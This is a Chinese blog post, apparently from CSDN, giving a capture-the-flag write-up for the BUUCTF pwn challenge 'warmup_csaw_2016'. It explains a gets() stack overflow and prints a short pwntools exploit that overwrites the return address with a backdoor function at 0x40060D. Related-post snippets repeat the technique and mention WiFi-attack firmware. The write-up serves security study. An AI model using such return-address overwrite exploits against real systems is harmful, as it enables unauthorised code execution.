[BUUCTF-PWN] warmup_csaw_2016

最新推荐文章于 2024-02-29 11:36:19 发布
最新推荐文章于 2024-02-29 11:36:19 发布
阅读量338 收藏
点赞数
分类专栏: BUUCTF-PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46098032/article/details/122294097
版权

下载文件,checksec看一下,保护都没开,64位文件。

用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。

看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。

 

sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。

exp为:

from pwn import *


p = remote('node4.buuoj.cn', 25743) 


payload = b'a' * (0x40 + 8) + p64(0x40060D)
p.recvuntil("WOW:0x40060d")
p.sendline(payload)
p.interactive()

 得到flag。

 

迷迷糊糊看世界
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1632
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
warmup_csaw_2016解题思路及步骤
最新发布
2301_81504456的博客
02-29 323
合理选取返回地址,在字符串窗口中寻找有用数据信息。
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 434
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1271
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
BUU刷题-Pwn-warmup_csaw_2016
一个啥也不会的小菜鸡!
07-13 77
同时存在危险函数get(),可以实现栈溢出漏洞!发现v5变量距离ebp+8=0x40+8。分析:有后门函数,利用栈溢出。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 307
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
warmup_csaw_2016
weixin_56301399的博客
07-20 1322
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
BUUCTF刷题之路-warmup_csaw_20161
qq_30528603的博客
05-27 284
大概明确函数的执行流程。而且我们在主函数一眼就看到一个危险函数gets,大概率就是个栈溢出。然后我们又在IDA中发现有system和一个后门函数,那这题就非常简单,跟上一题是一个思路的。那我们就直接栈溢出覆盖返回地址到后门函数,这题就做完了。在主函数中我们看到v5变量离rbp距离是0x40h,因为是64位程序还得加8才到返回地址。这题原本昨天就打算发的,刚做完电脑死机了。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 367
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 435
buuctf pwn
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 369
buuctf-pwn 001-016题wp
buuctf--pwn-warmup
weixin_45427676的博客
09-19 481
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
buuctf warmup
doudoudedi
01-28 541
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
mqtt-pwn安装
09-20
3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值